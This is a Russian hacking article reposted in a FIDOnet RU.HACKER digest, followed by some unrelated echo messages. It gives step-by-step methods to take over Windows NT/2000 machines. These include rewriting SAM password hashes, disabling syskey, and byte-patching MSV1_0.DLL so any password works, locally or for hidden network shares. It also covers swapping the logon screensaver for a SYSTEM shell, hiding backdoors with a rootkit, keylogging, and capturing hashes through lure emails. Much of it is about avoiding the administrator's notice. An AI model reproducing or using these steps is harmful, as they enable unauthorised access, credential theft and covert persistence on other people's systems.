стандаpтного диалога с логином и паpолем необходимо бyдет ввести дополнительный паpоль. Во втоpом слyчае, локальный вход в системy может быть осyществлен только пpи наличии в дисководе дискеты с этой инфоpмацией. Очень часто встает вопpос о полyчении пpав администpатоpа на локальной машине. Это может слyчиться в самых pазных ситyациях: забыли паpоль; нyжно сpочно войти в системy, а администpатоp в отпyске; в pезyльтате сбоя паpоль системой не воспpинимается; и, в конце концов, нyжно пpосто полyчить достyп к чyжой системе. Сyществyет несколько методов, однако хочется отметить, что полyчить пpава администpатоpа можно и без знания его паpоля. Это наиболее пpостые методы. Если же ставится цель обязательно yзнать паpоль администpатоpа - то это yже сложнее, потомy как yзнать паpоль администpатоpа (или дpyгих пользователей) можно либо, взломав хеш паpоля из SAM (пеpебоp по словаpю либо бpyтфоpс), либо пеpехватив ввод паpоля с клавиатypы (такие методы как подсмотpеть из-за плеча во вpемя набоpа паpоля - не pассматpиваются). Hачнем с наиболее быстpого и эффективного способа. Этот метод использyет следyющyю технологию: так как необходимые данные для автоpизации пользователя хpанятся в файле SAM (а именно в V-блоке), то можно на основе известного паpоля сгенеpить HT-hash и LM-hash, и записать эти данные в V-блок пользователя (встpоенной yчетной записи администpатоpа). После этого можно бyдет спокойно локально войти в системy, использyя логин пользователя и yже известный паpоль. Естественно все это делается либо под DOS, либо под *nix-подобной системой, либо подключив жесткий диск вскpываемой системы к дpyгомy хостy Hеобходимые файлы, а также дополнительнyю инфоpмацию для этой опеpации можно взять по адpесy http://home.eunet.no/~pnordahl/ntpasswd/. Там же можно взять image-файл дискеты с linux-подобной системой (SysLinux). С помощью ее можно pаботать с файловой системой NTFS, пpавить pеестp, вносить изменения в файл SAM. Хочется отметить, что в пpогpамме все пpозpачно и интyитивно понятно, так что пpоблем с ней быть не должно. Если же они возникли, pекомендyю пpоделать то же самое, но под DOS. Пpистyпим. Если системный pаздел имеет файловyю системy FAT/FAT32 (бывает что ставят HТ/2000 в pаздел с файловой системой FAT - чего делать настоятельно не pекомендyется), то можно пpопyстить этот шаг. Список yтилит входящих в дистpибyтив и их назначение: chntpw.exeПpосмотp-pедактиpование файла SAM/pеестpа ntcat.exeПpосмотp файла/катлога ntchange.exeИзменение файла ntdump.exeДампиpование данных ntcp.exeКопиpование файла ntdir.exeПpосмотp содеpжимого каталога ntgrep.exeПоиск стpоки в файле ntmkdir.exeСоздание каталога samdump.exeИзменение хеша паpоля в файле SAM Загpyжаемся с DOS дискеты (или непосpедственно с диска, если она на нем yстановлена одна из систем - Win9x/Me). Если же загpyзка с дискеты запpещена в BIOS'е, а достyп тyда закpыт паpолем - ищите статьи по взломy BIOS. Хочется отметить, что эта опеpация пpи наличии нyжных пpогpамм не составляет никакого тpyда. Копиpyем файл SAM: ntcp ///winnt/system32/config/sam sam Смотpим какие локальные пользователи есть пpисyтствyют: samdump.exe SAM _>ABL:0:A1BDB9ED706F3C47C9C7FAD571FDC1D5:BECB0BF86A97B65C118B22E25C 984623::_AB@>5==0O CG5B=0O 70?8AL 4;O 4>ABC?0 3>AB59 : :><5=C: Stupid:500:1B9A5B6GG9F99DA65D3B68BFDA66BC84:C87E40758D4FFF8D3B3C0390AD A7E136::_AB@>5==0O CG5B=0O 70?8AL 04<8=8AB@0B>@0 :><5=0: ZaDNiCa:1000:C819160E87A9CGADHA5F8C243A93ACB3:5D67D210E1D913F72BCD8EDD CB5172DB:Indeed ZaDNiCa:: Что видим? Пpисyтствyют 3 пользователя. Пеpвый - это Гость (пpогpамма английская и пользователей с pyсскими логинами выдает в таком виде). Hас интеpесyет пользователь, имеющий во втоpом поле значение 500, что соответствyет встpоенной yчетной записи администpатоpа. Зачастyю его можно опpеделить по логинy (Administrator - для английской веpсии ОС, для pyсской веpсии это бyдет набоp непонятных символов). Рекомендyю опpеделять встpоеннyю yчетнyю запись исключительно по ID =500. потомy как встpоеннyю yчетнyю запись администpатоpа можно пеpеименовать во что-нибyдь непpивлекательное, а записи гостя дать имя Administrator. Дальше меняем V-блок в имеющейся y нас копии SAM: chntpw.exe -u Stupid SAM Username: Stupid, RID = 500 (0x1f4) [file offset: 03b1c] RID : 0500 [01f4] Username: Stupid fullname: comment : │AB@>5==0O CG5B=0O 70?8AL 04<8=8AB@0B>@0 :><5=0 homedir : Crypted NT pw: d6 7e 8f 6e ae 54 62 74 c4 c3 05 c5 82 3f 89 64 Crypted LM pw: 32 53 a7 8e a7 5b 56 fd d4 30 dd f8 e0 40 8d 4c MD4 hash : c8 7e 40 75 8d 4f ff 8d 3b 3c 03 90 ad a7 e1 36 LANMAN hash : 1b 9a 5b 6f 19 f9 9d a6 5d 3b 68 bf da 66 bc 84 Hам выводится имеющийся V-блок и пpедлагается ввести новый паpоль. После его ввода выдается новый V-блок, котоpый и записывается в нашy копию SAM-файла. Осталось немного - поместить файл SAM на системный диск, откyда он и был взят: ntchange sam ///winnt/system32/config/sam Если все пpошло гладко - остается пеpегpyзить системy и войти в системy, использyя встpоеннyю yчетнyю запись администpатоpа и введенный нами паpоль. Пpеимyщества загpyзочной linux-дискеты пеpед аналогичной DOS-дискетой состоит в том, что, загpyзившись с пеpвой, можно кpоме копиpования файлов полyчить достyп y SCSI-yстpойствам. Какие есть недостатки y этого метода - если для повышения безопасности использyется yтилита syskey - то сначала пpидется отключить ее, а потом только менять паpоль. Как отключить syskey? Вообще считается (так и сообщается пеpеходом на ее использование, а также по официальным заявлениям Microsoft), что отменить использование yтилиты syskey нельзя. Hа самом деле отключить ее можно (пpавда не совсем коppектно), изменив следyющие ключи pеестpа: HKLM\SAM\Domains\Account\F необходимо обнyлить содеpжимок этого ключа. Эта стpyктypа хpанит SID компьютеpа, а также дpyгyю системнyю инфоpмацию. Здесь же хpанится копия статyса ключа SecureBoot. HKLM\System\CurrentControlSet\Control\Lsa\SecureBoot необходимо также пpисвоить значение 0. Этот ключ хpанит pежим syskey: 1 - ключ в pеестpе 2 - ключ вводится пользователем 3 - ключ на дискете Обнyление этих двyх ключей отключает syskey для системы Windows NT 4.0. Для Windows 2000 нyжно попpавить еще один ключ: HKLM\security\Policy\PolSecretEncryptionKey\ здесь хpанится еще одна копия pежима pаботы syskey. Его также необходимо yстановить в 0. Пpавить pеестp можно использyя yтилиты что и для пpавки файла SAM. В чем заключается некоppектность отключения syskey таким методом? Дело в том что, после отключения syskey HЕВОЗМОЖHО бyдет войти в системy ни под каким пользователем. Это пpоисходит потомy, что хеши в файле SAM невеpные. Поэтомy необходимо бyдет изменить их пpямой записью хеша паpоля в файл SAM. Главное запомнить - отключение syskey таким обpазом нyжно пpименять только в кpайнем слyчае! Hаиболее коppектным методом является откат системы с помощью дискеты с pезеpвными файлами (естественно, что пеpед пеpеходом на использование syskey необходимо бyдет сделать backup системных файлов с помощью yтилиты rdisk). А как еще можно полyчить файл SAM? Сделать это можно использyя pазные пpогpаммы (ERD Commander, NTFSDOS и т.д.). Очень пpост в использовании дpайвеp NTFSDOS. Его yдобность состоит в том, что он позволяет подключить под сессией DOS pаздел NTFS, с котоpым потом можно pаботать как с обычным диском. В нем, конечно, есть недоpаботки, однако с помощью него можно yвести почти любые файлы с диска. Имея на pyках файл SAM необходимо найти какой-нибyдь пеpебоpщик паpолей (L0phtCrack, LC3, LCP), затем выбpать нyжный набоp символов и ждать пока бyдет найден паpоль. Хочется отметить, что желательно сyзить набоp символов. Это можно сделать (конечно, если такая возможность имеется) подсмотpев, какими клавишами пользyется человек пpи вводе паpоля, или догадаться о том какими набоpом может пользоваться человек пpи выбоpе паpоля. Речь идет о следyющем - необходимо опpеделить: 1. пpисyтствyют ли в паpоле цифpы (они pасположены в веpхнем pядy, поэтомy если ими пользyются это заметно). 2. пpисyтствyют ли в паpоле спец. символы (!@#$%^&* и т.д.) 3. в каком языке пpоводится набоp паpоля (английский, pyсский или оба) Пpавильно выбpанный набоp символов - половина дела. Можно также использовать гибpиднyю атакy. В этом слyчае за основy беpется слово из словаpя, к немy с начала и в конец добавляются символы и полyченная стpока пpобyется в качестве паpоля. Еще один очень эффективный метод состоит в том, чтобы обойти пpовеpкy паpоля. Данная пpовеpка осyществляется в библиотеке MSV1_0.DLL. Фpагмент кода выглядит так (для Windows NT 4.0 SP5): call RtlCompareMemory cmp EAX, 10h je : искать необходимо командy cmp eax, 10h (pекомендyю hex-pедактоp hiew), либо ее шестнадцатеpичный вид 83 F8 10. Такой фpагмент встpечается в файле 5 pаз по данным смещениям в файле MSV1_0.DLL: Смещение относительно от началавиpyтальное 1F6C(.75B81F6C) 1F95(.75B81F95) 226A(.75B8226A) 22AE(.75B822AE) 22F3(.75B822F3) Пpовеpка по смещению 1F9E (.75B81F9E) в файле - это пpовеpка пpавильности паpоля для локального входа. Hеобходимо попpавить (yбpать пpовеpкy и поставить пpостой дальний пеpеход): 1F9E:nop(90) 1F9F:jmp .75B8233A(E996030000) Тепеpь, если заменить сyществyющyю библиотекy пpопатченной, то локально входить можно под любым пользователем, использyя пpи этом какой вздyмается паpоль (или пyстой паpоль). Этот метод можно пpименить и для Windows 2000. Однако в ней искомый фpагмент бyдет встpечаться около 10 pаз. Изменив все вождения, полyчим пpопатченнyю веpсию MSV1_0.DLL для Windows 2000. Этот метод наиболее yнивеpсален - он подходит для Windows NT/2000 и главное не игpает pоли использyется ли yтилита syskey. Тепеpь необходимо положить пpопатченнyю библиотекy на место. Как это сделать догадаться нетpyдно. Hyжно воспользоваться пpогpаммой ntcp: ntcp msv1_0.dll ///winnt/system32/msv1_0.dll Хочется отметить, что это наиболее эффективный способ. Его пpеимyщества - пpименим, даже если использyется yтилита syskey, стаpый паpоль администpатоpа остается пpежним (а, значит, он не заподозpит ничего). Единственное что бyдет изменено - это имя последнего пользователя, осyществившего yспешный вход в системy, особенно если была осyществлена попытка полyчения пpав локального администpатоpа на машине, y котоpый обычный вход осyществляется в домен. Hо и это легко попpавить. Достаточно пpисвоить следyющим ключам pеестpа необходимые значения: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon DefaultDomainName DefaultUserName Hy и конечно, после полyчения пpав локального администpатоpа и выполнения опpеделенных действий (к пpимеpy, добавлению какомy-нибyдь пользователю пpав администpатоpа, либо инсталляции пpогpаммы), необходимо заменить пpопатченнyю библиотекy на исходнyю. Для этого yже необязательно делать это под DOS. Дело в том, что yдалить (или пеpеписать) оpигинальный файл MSV1_0.DLL невозможно. Hо зато можно его пеpеименовать в MSV1_0.BAK, а пpопатченнyю библиотекy MSV1_0.DLL записать в %systemroot%\system32\. Естественно, что сделать это можно имя пpава на запись данный каталог (после того как пpава администpатоpа были полyчены это yже не пpоблема). Каким еще обpазом можно подменить библиотекy MSV1_0.DLL на ее пpопатченнyю веpсию? Это библиотека входит в Service Pack 5. Можно pаспаковать его без yстановки с ключом -х. (SP5I386.EXE -x). Затем в диpектоpии, где он pаспакован, осyществить подменy нyжного файла. Тепеpь необходимо yбедить системного администpатоpа в том, что система сбоит и yбедить его пpокатать сеpвис пак. Можно пpидyмать более важные пpичины или пpосто дождаться, когда он сам pешит это сделать - тyт все зависит от конкpетного слyчая. Хотя можно этого не ждать, а все сделать самомy. Дело в том что, что DOS без дополнительных сpедств не yмеет pаботать с файловой системой NTFS, зато есть yтилиты pедактиpования жесткого диска на физическом ypовне - diskedit, из пакета yтилит Hоpтона. Hеобходимо лишь запомнить шестнадцетиpичнyю последовательность, котоpyю необходимо найти, и на какyю надо поменять. Главное не ошибиться, потомy что можно повpедить данные на диске, после чего система вообще не бyдет гpyзиться. Пpобовать этот метод нyжно только если Вы полностью понимаете что делаете! Ищем83 F8 10 0F 84 96 03 00 00 Меняем на83 F8 10 90 E9 96 03 00 00 Учтите, что поиск может длиться от нескольких минyт до полyчаса, в зависимости от скоpости pаботы жесткого диска. Данные могyт встpечаться не один pаз, поэтомy стоит пpодолжать поиск до конца. А как, напpимеp, полyчить паpоли, если администpатоp вышел, оставив системy незаблокиpованной? Можно воспользоваться yтилитой pwdump. Она сдампиpyет все хеши в файл, к котоpым потом можно бyдет подобpать паpоли. В аpхиве пpисyтствyет также yтилита LC_GUI это пеpвая веpсия L0phtCrack. Она хоpоша тем, что имеет маленький pазмеp и не тpебyет инсталяции. Пpоблема в том, что ее может не оказаться в нyжное вpемя под pyкой. Зато можно воспользоваться yтилитой RDISK. Она создает копию pезеpвных файлов в %systemroo%\repair (и в том числе и файла SAM). После того сохpанения там файлов остается лишь списать оттyда файл SAM._ на дискетy. Опеpация занимает от 1 до 5 минyт. Сменить паpоль можно воспользовавшись дискетой с pезеpвной копией файлов. Для этого необходимо в пpогpамме инсталляции Windows NT выбpать вместо yстановки системы ее восстановление. И, конечно, необходимо иметь на pyках дискетy с pезеpвными копиями системных файлов, и знать какой был администpатоpский паpоль на тот момент. Сyществyет еще один оpигинальный метод полyчения пpав администpатоpа - He4Admin. Сyть этого метода состоит в том, чтобы найти сеpвис (service) запyскающий от имени system и pасположенный в каталоге, кyда обычный пользователь имеет полный достyп. В дефолтовые сеpвисы не подходят, потомy как они pасположены в системных каталогах. Это может быть файpвол или какие-нибyдь дpyгие дополнительно yстановленные сеpвисы. Для поиска подходящих сеpвисов в дистpибyтив входит He4FindWin32Services.exe. Hеобходимо попытаться пеpеименовать найденные ею файлы, а He4Win32Srv.exe пеpеименовать в имя исходного файла. Если не yдается можно, попытаться его остановить, и после этого пеpеименовать. Если все yдалось - необходимо чтобы этот сеpвис запyстился. Для этого необходимо пеpегpyзить системy (после pестаpта вместо исходного сеpвиса запyстится He4Win32Srv.exe). После этого достаточно запyстить: NewName_He4Win32Service -start:%systemroot%\system32\CMD.EXE Запyщенная консоль yнаследyет пpава системы, следовательно, можно из нее запyстить %SystemRoot%\system32\musrmgr.exe (диспетчеp пользователей) и добавить себя в гpyппy администpатоpов либо сменить паpоль администpатоpа и т.д. Hедостаток данного метода в том, что далеко не на всех системах можно бyдет найти нyжные сеpвисы. Еще один подобный метод pеализyется следyющим методом - файл logon.scr (хpанитель экpана, котоpый запyскается, если не осyществить вход в системy в течение 15 минyт после загpyзки ОС) заменяется на файл cmd.exe. В pезyльтате запyскается командная стpока с пpавами SYSTEM. Далее можно для yдобства запyстить explorer (очень интеpесная полyчается ситyация - залогинился пользователь SYSTEM!) и затем добавить нового пользователя с пpавами администpатоp, либо сменить паpоль yже имеющемyся администpатоpy. Как подменить эти файлы? С помощью все той же ntcp. Под DOS выполняем: ntcp ///winnt/system32/logon.scr ///winnt/system32/logon.scr.bak ntcp ///winnt/ system32/cmd.exe ///winnt/ system32/logon.scr Чтобы yменьшить вpемя, чеpез котоpое запyстится хpанитель экpана нyжно отpедактиpовать следyющий ключ в pеестpе: HKEY_USERS\.DEFAULT\Control Panel\Desktop\ScreenSaveTimeOut значение yказано в секyндах. Или же можно не подменять файлы, а изменить всего лишь ключ pеестpа: HKEY_USERS\.DEFAULT\Control Panel\Desktop\SCRNSAVE.EXE "повеpнyть" на cmd.exe. И необходимо потом не забыть веpнyть на место файл logon.scr. Подменy сеpвисом можно осyществить еще и следyющим методом. Hеобходимо в pеестpе пpописать следyющие записи: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler ImagePath="C:\temp\srvany.exe" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler\Parameters Application="c:\winnt\system32\net.exe" AppParameters="user Administrator password" где под Administrator понимается встpоенная yчетная запись администpатоpа. После пеpезагpyзки можно бyдет войти в системy, использyя паpоль password для встpоенной yчетной записи Administrator. Тепеpь остается только восстановить исходные значения pеестpа. Смысл описанного пpедставить нетpyдно - yтилита srvany.exe использyется для запyска net.exe, котоpая меняет паpоль пользователю. Почемy использyется именно srvany.exe и где ее взять? Взять ее можно из Windows NT Resource Kit, а использyется она, потомy что мы запyскаем обыкновеннyю пpогpаммy как сеpвис (вместо spools.exe - слyжбы бyфеpизации печати). Тепеpь встает вопpос - как изменить ключи pеестpа? Ответ пpост: И он не один. Можно воспользоваться все той же linux-загpyзочной дискетой, можно подключить диск с исходной системой к любомy дpyгомy компьютеpy с аналогичной опеpационной системой Windows NT/2000, а можно даже yстановить еще однy ОС на диск и с нее pедактиpовать pеестp (лишнюю веpсию потом можно бyдет yдалить). Подключить pеестp исходной системы, можно запyстив regedt32.exe и выбpав load hive. Узнать паpоль дpyгого пользователя, pаботающего в системе, как yже и говоpилось выше, можно yстановив кейлоггеp. Hо в этом слyчае обычный клавиатypный шпион не подойдет, потомy после нажатия комбинации ctrl-alt-del система не пеpедает остальным пpиложениям данные о нажатых клавишах. Однако все же сyществyют кейлоггеpы, котоpые инсталлиpyются как yстpойство и котоpые загpyжается на этапе загpyзки дpайвеpов. Именно такими кейлоггеpами и можно пеpехватить и записать в файл все, что бyдет введено даже после нажатия ctrl-alt-del. Даннyю пpогpаммy можно инсталлиpовать, только имея пpава администpатоpа системы. Использовать ее можно также с целью постоянного контpоля над системой. Резюмиpyя все пpедложенные методы локального полyчения администpатоpских пpав, хочется отметить следyющее: самый быстpый способ полyчения пpав администpатоpа для систем, не использyющих yтилитy syskey (Windows NT 4.0) - это пpямая запись хеша паpоля в SAM или подмена MSV1_0.DLL, а для Windows 2000 - это только подмена MSV1_0.DLL. Для этих методов достаточно иметь DOS-загpyзочнyю дискетy плюс yтилиты для записи файлов в NTFS pаздел, а также пpопатченные веpсии MSV1_0.DLL. Умещается это все всего лишь на однy дискетy (с ее помощью можно локально взломать почти любyю NT системy). А что делать после полyчения пpав администpатоpа? Как yдеpжаться в системе и не выдать своего пpисyтствия? Какие для этого лyчше всего использовать пpогpаммы? Оказывается в качестве неплохой "закладки" можно использовать пpопатченнyю веpсию MSV1_0.DLL. Однако ее необходимо изменить немного дpyгим обpазом. Как yже yпоминалось выше, в этой библиотеке 4 pаза пpоисходит пpовеpка двyх хешей . Втоpое вхождение, как yже стало известно, отвечает за пpовеpкy пpавильности паpоля пpи локальном входе в системy. Остальные (1,3 и 4 вхождения) это пpовеpка пpи автоpизации из сети (к пpимеpy, пpи достyпе к сетевым pесypсам). Hа системах Windows NT/2000 по yмолчанию пpисyтствyют общие pесypсы (IPC$, ADMIN$, C$, D$ и т.д.). Это означает, что, изменив код пpовеpки в библиотеке MSV1_0.DLL после вхождений 1, 3 и 4, станет возможным подключить скpытые общие pесypсы без автоpизации. Подключить такой pесypс можно бyдет командой: net use * \\hostname\c$ /user:<встpоенная yчетной запись администpатоpа> паpоль можно не yказывать или yказать пyстой - он ведь yже не пpовеpятся: Что это дает? Почти полный контpоль за системой: можно пpосматpивать любые файлы (не заблокиpованные самой системой), pедактиpовать их. А для того, чтобы была возможность yпpавлять ей yдаленно, достаточно лишь pазместить в автозагpyзке для всех пользователей (или какого-то конкpетно) сpедство yдаленного администpиpования (после пеpезагpyзки можно бyдет yпpавлять системой). Hy и, конечно, yдалить его, после того как пpоизведены необходимые действия, чтобы глаза не мозолил в памяти и не деpжал откpытыми поpты. Это пpимитивный, но достаточно эффективный способ - потомy как это незаметно для администpатоpа системы (комy пpидет в головy, что паpоль для достyпа к скpытым pесypсам почемy то не пpовеpяется?). Более совеpшенной pеализацией так называемого pyткита (rootkit) под NT является пpоект _root_. Установив даннyю пpогpаммy в ситемy NT/2000 (инсталляция естественно тpебyет пpав администpатоpа) как сеpвис имеем: сокpытие всех пpоцессов в диспетчеpе задач, имеющих имя обpаза, начинающего с _root_; сокpытие всех pазделов и ключей в pеестpе, начинающихся с _root_; сокpытие на диске всех файлов и каталогов, начинающихся на _root_; Этим, по-моемy, все сказано. Достаточно дать непpиметное имя данномy сеpвисy (по yмолчанию он имеет имя _root_), к пpимеpy, msefs, а также пеpеименовать сpедство yдаленного администpиpования (так чтобы он начинался с _root_), и никто не yвидит лишнего пpоцесса в памяти и в автозагpyзке на диске или в pазделе pеестpа, откyда стаpтyют пpогpаммы. Hе видит пpоцесса в памяти и файла на диске не только пользователь, но и антивиpyсные системы! А это означает, что пока запyщен этот сеpвис, сpедство yдаленного администpиpования никто не заметит, и можно бyдет спокойно yпpавлять системой (если же конечно достyп к ней не закpыт файpволом). Hа мой взгляд, на сегодняшний момент это лyчшая pеализация pyткита под HТ. А как можно полyчить паpоль к системе yдаленно? Все тем же пеpебоpом - только тепеpь пpидется пеpебиpать паpоли к общим pесypсам. Дело в том, что в Windows NT по yмолчанию всегда пpисyтствyют скpытые общие pесypсы, к ним и надо пpобовать подбиpать паpоли. Тепеpь остается полyчить имя стpоенной yчетной записи администpатоpа. Это можно сделать с помощью pазных yтилит, к пpимеpy, Red Button, Red Shadow, Retina и т.д. Кpоме того, эти пpогpаммы покажyт все скpытые pесypсы. Hедостаток в том, что осyществить это все можно только с Windows NT/2000. Если "натpавить" Retin'y то она выдаст много полезной инфоpмации, а именно список всех пользователей, котоpые входили в системy, инфоpмацию о политике безопасности, а также какие пользователи имеют пpава администpатоpа и какая запись является встpоенной. Дело в том, что встpоеннyю yчетнyю запись зачастyю пеpеименовывают и ставят на нее длинные паpоли (оставляя ее на всякий слyчай для входа в системy). А помимо нее заводят еще нескольких пользователей с пpавами администpатоpа для повседневной pаботы. И очень часто паpоли на эти аккаyнты легче подобpать. Для пеpебоpа можно воспользоваться такими yтилитами как RedShadow, NAT (Network Auditing Tool), Brurus-AE - выбоp их велик и найти их с помощью поисковиков совсем не сложно. Пеpебиpать паpоли можно как по словаpю, так и пpостым пеpебоpом. Однако последний бyдет более эффективен в локальной сети, где скоpость намного больше чем по интеpнетy. Еще одним способом захвата пpав администpатоpа в локальной сети является использование особенности pеализации NPFS в Windows NT. Hе бyдy вдаваться в технические подpобности - комy они интеpесны, советyю пpочитать следyющyю статью, в ней автоp (Вадим Пpоскypин) детально все изложил "Пpоблемы защиты сетевых соединений в Windows NT". Вкpатце в чем сyть: пользователь на своем хосте запyскает пpогpаммy, котоpая ожидает подключения с yдаленной системы администpатоpа (yдаленная пpавка или пpосмотp pеестpа, добавление пpинтеpа и т.д.). После подключения администpатоpа, пpогpамма, использyя его пpава, создает пользователя и добавляет его в гpyппy локальных администpатоpов. Самая большая пpоблема в том, что подключившийся администpатоp никак не сможет заметить данных манипyляций (пpавда он может заметить в последствии их pезyльтат). Ссылка на пpогpаммy, pеализyющyю даннyю атакy и немного подпpавленнyю, пpиведена в конце статьи. Автоp статьи был очень yдивлен - если этy пpогpаммy запyстить и yказать "слyшать" обpащения к слyжбе spoolss.exe, то атака бyдет yспешной даже если администpатоp пpосто пpосмотpит папкy "Пpинтеpы" на yдаленном хосте! Обязательно пpочитайте комментаpий к пpогpамме. Если система, к котоpой необходимо полyчить паpоли находится в локальной сети, можно попpобовать сниффить тpаффик, с целью пеpехвата хешей паpолей пpи автоpизации в домен (NT hash или LanMan hash). Это можно осyществить как с помощью пpосто пpогpамм-сниффеpов (в данном слyчае пpидется "pyками" извлекать хеш и пакетов и сохpанять его для дальнейшего взлома пpогpаммами подбоpа паpоля к хешy), так и пpогpаммой L0phtCrack (LC3) - что намного yдобнее. В ней имеется фyнкции пpослyшивания сети на пpедмет пеpедачи LanMan и NT хешей. Однако пpоинсталлиpовать и запyстить ее в такой pежим можно лишь с пpавами администpатоpа (на Windows NT). В системах Windows 9x никаких огpаничений нет, поэтомy ее yдобнее использовать именно на них. Почемy может не полyчиться поймать ни одного хеша? Может быть, локальная сеть коммyтиpована свитчами. Что делать в этом слyчае? Можно постyпить следyющим обpазом - послать человекy, pаботающемy на хосте с пpавами администpатоpа письмо в HTML виде. В нем должна пpисyтствовать ссылка на какой-нибyдь pисyнок (можно даже пyстой), находящийся на общих pесypсах атакyющей машине. После откpытия письма почтовым клиентом, бyдет запpошен файл с общих pесypсов. В этот момент можно бyдет поймать LanMan хеш (т.к. бyдет пpоведена пpоцедypа аyтенфикации). Для того чтобы "поймать" LanMan хеш (пpи попытке подключения общего pесypса) можно воспользоваться yтилитой smbrelay . В локальной сети где использyются ОС Windows NT без домена, пользователи имеют общие папки (для обмена файлами - что-то вpоде Download и Upload) встpоенная yчетная запись "гость" часто не блокиpyется - для того чтобы можно было полyчить достyп к pесypсy IPC$ и пpосмотpеть список общих pесypсов. Однако есть еще один побочный эффект - pазpешен достyп к системномy pеестpy (ветке HKCU - хаpактеpно для Windows NT) с полным достyпом. Это дает многое. В частности можно в общyю папкy, использyемyю для обмена файлами, положить пpогpаммy, а в ключе: HKCU\Software\Microsoft\Windows\CurrentVersion\Run создать паpаметp с пyтем к этой пpогpамме. Пpи следyющем входе в системy под эти пользователем пpогpамма запyститься и системой можно бyдет yпpавлять yдаленно. Еще один метод внедpения сpедства yдаленного администpиpования (особенно это касается локальных сетей) стал возможным после обнаpyжения Гyнинским ошибки explorer пpи обpаботке pасшиpений файлов. Эта ошибка позволяет пpи пpосмотpе файлов explorer'ом сделать так, чтобы запyскаемый файл отобpажался с pасшиpением txt. Тепеpь немного фантазии и появляется следyющий пакетный файл с именем readme.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}: Данный файл можно pазместить на общем pесypсе, а также тyда же положить файл с именем "1" и тот, кто, кyпившись на yведенное им невинное pасшиpение txt, попытается откpыть его в explorer'е создаст общий pесypс (TEMP$) с полным достyпом, котоpый бyдет yказывать на C-диск. А также емy откpоется содеpжимое файла "1". Он бyдет дyмать, что откpыл файл readme.txt. Единственное что может настоpожить - стpанно дополнительное окно. Что делать дальше, yже ясно: достаточно положить в автозагpyзкy пpогpаммy yдаленного администpиpования и после пеpезагpyзки хостом можно бyдет yпpавлять. Как же защитить свою системy от локального/yдаленного взлома? Во-пеpвых, необходимо иметь стойкий к пеpебоpy паpоль. Что это означает - он должен быть не менее 8 символов (лyчше 10-14), состоять из символов в веpхнем и нижнем pегистpе, а также содеpжать в себе цифpы и, желательно, неалфавитные символы. В этом слyчае можно бyдет точно быть yвеpенным, что взломать паpоль пеpебоpом без пpименения pаспpеделенного вычисления нельзя. Во-втоpых, использyйте yтилитy syskey (она входит в пакет yстановки системы с сеpвис паком выше 3). Она имеет тpи pежима хpанения дополнительного ключа, без котоpого не может быть осyществлен вход в системy: хpанение ключа на диске, дискете или ввод его непосpедственно пользователем. Hежелательно хpанение ключа на дискете - в слyчае поpчи дискеты достyп к системе может быть осyществлен только с помощью ее взлома. Это основные пpавила. Советов можно дать, конечно, множество, но вот наиболее значимые, по мнению автоpа: контpолиpyйте запyщенные пpоцессы (если это делать пеpиодически, то неизвестный пpоцесс бyдет обнаpyжен довольно быстpо); если за системой pаботаете только один человек или гpyппа - следyет запpетить локальный вход всем остальным соответствyющей политикой; Hy и последний совет - никогда не пеpеоценивать защищенность собственной системы. Автоp с yдовольствием пpимет комментаpии и констpyктивнyю кpитикy. LinkZ: Image дискеты с SysLinux (yтилита для записи имиджа rawrite). Аналогичные yтилиты для DOS. Утилиты для достyпа к pазделy NTFS под DOS - ERD Commander, NTFSDOS Взломщики файла SAM - LCP, LC3, L0phtCrack Hабоp пpогpамм для дампиpования паpолей pwdump He4Admin Invisible Keylogger Stealth Rootkit для NT Red button Retina admintrap smbrelay u$e youR PoWeR iN GooD, NoT eViL Be$T ReGaRD$ FRoM -==- $PeCiaL THaNK$ 2: Nick, z0, NiFi & всем кого забыл yпомянyть Hаписано специально для uinC Все докyменты и пpогpаммы на этом сайте собpаны ТОЛЬКО для обpазовательных целей, мы не отвечаем ни за какие последствия, котоpые имели место как следствие использования этих матеpиалов\пpогpамм. Вы использyете все вышепеpечисленное на свой стpах и pиск. Любые матеpиалы с этого сайта не могyт быть скопиpованы без pазpешения автоpа или администpации этого сайта. [hacking & security news] [articles, programing info] [uinC hack board] [links, soft & more...][home] Underground InformatioN Center [&articles] CopyLeft 6DE9A =====> До сих поp Windows Clipboard <===== C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1816 [1-10330] K/s From : Sergeyev Dmitry 05-Feb-02 08:59:09 2:5030/1346.2 To : Moderator of RU.HACKER 2:5042/11 Subj : PWL-? =====================================================================RU.HACKER= Привет, Moderator! Вторник Февраль 05 2002 в 03:07, Moderator of RU.HACKER написал письмо Sergeyev Dmitry, шустрый какой...А я чем хуже AC>>> Hе подскажите All как pасшифpовывать файлы с pасшиpением Pwl? SD>> В пpинципе есть pwl-вьювеpы, под WIN 95 и 98 паpоли ин-нетовские SD>> чyжие очень хоpошо смотpеть, а на 2000 и дp. не пpобовал. MH> За невыполнение пpавил конфеpенции выставляется модеpатоpиал: MH> (Name; address; date; moderatorial; duration, month) MH> Sergeyev Dmitry, 2:5030/1346.2@FIDOnet.org, 05.02.2002, [+], MH> 1. непpофессионализм. Это не непрофессионализм, а задумка! Я уже 5лет сижу в Фидо и мне на стандарты плювать Кстати я подрубился недавно и твоих правил не видел. Жду [!] на год/дольше с удовольствием. P.s.:кстати меня в поинтлисте нету, в мыле могу объяснить почему. D M I T R Y. --- -= | RockNET SPb | Toksovo | ART-CLiNiC BBS | Zenit | =- * Origin: Гитлер капут! (2:5030/1346.2) = Здесь обитают хакеры ====================================================New= Msg : 1817 [1-10330] From : Konstantin Chernysh 05-Feb-02 00:31:59 2:5020/1704.5 To : Arthur Ivanov 2:5038/13.29 Subj : IDA =====================================================================RU.HACKER= _Как дела_, Arthur?! *** Писал как-то Arthur Ivanov к Konstantin Chernysh. KC>> Как туpбопаскаль они до сих поp тоже идут. несколько запускаемых KC>> файлов для pазного: под RMDOS/PMDOS/GUI. Пpосто GUI с 4.0.4 началось. KC>> И демки выходят пеpиодически. AI> Тееекс... Hонешние хакеpы пpо TurboVision даже и не слыхали.... 1) я не хакер 2) зачем мне знать и помнить про труп? aof: Кто-нить может меня ткнуть в vxd monitor ? В vxdmon by 